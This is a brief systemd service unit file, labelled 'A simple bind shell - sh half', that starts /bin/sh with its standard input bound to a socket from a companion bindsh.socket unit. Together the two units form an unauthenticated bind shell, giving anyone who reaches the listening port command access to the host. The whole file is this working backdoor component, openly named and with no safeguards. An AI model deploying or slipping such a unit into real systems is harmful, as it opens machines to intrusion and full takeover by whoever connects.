; https://www.freedesktop.org/software/systemd/man/systemd.service.html
[Unit]
Description=A simple bind shell - sh half
Requires=bindsh.socket

[Service]
Type=simple
StandardInput=socket
ExecStart=/bin/sh
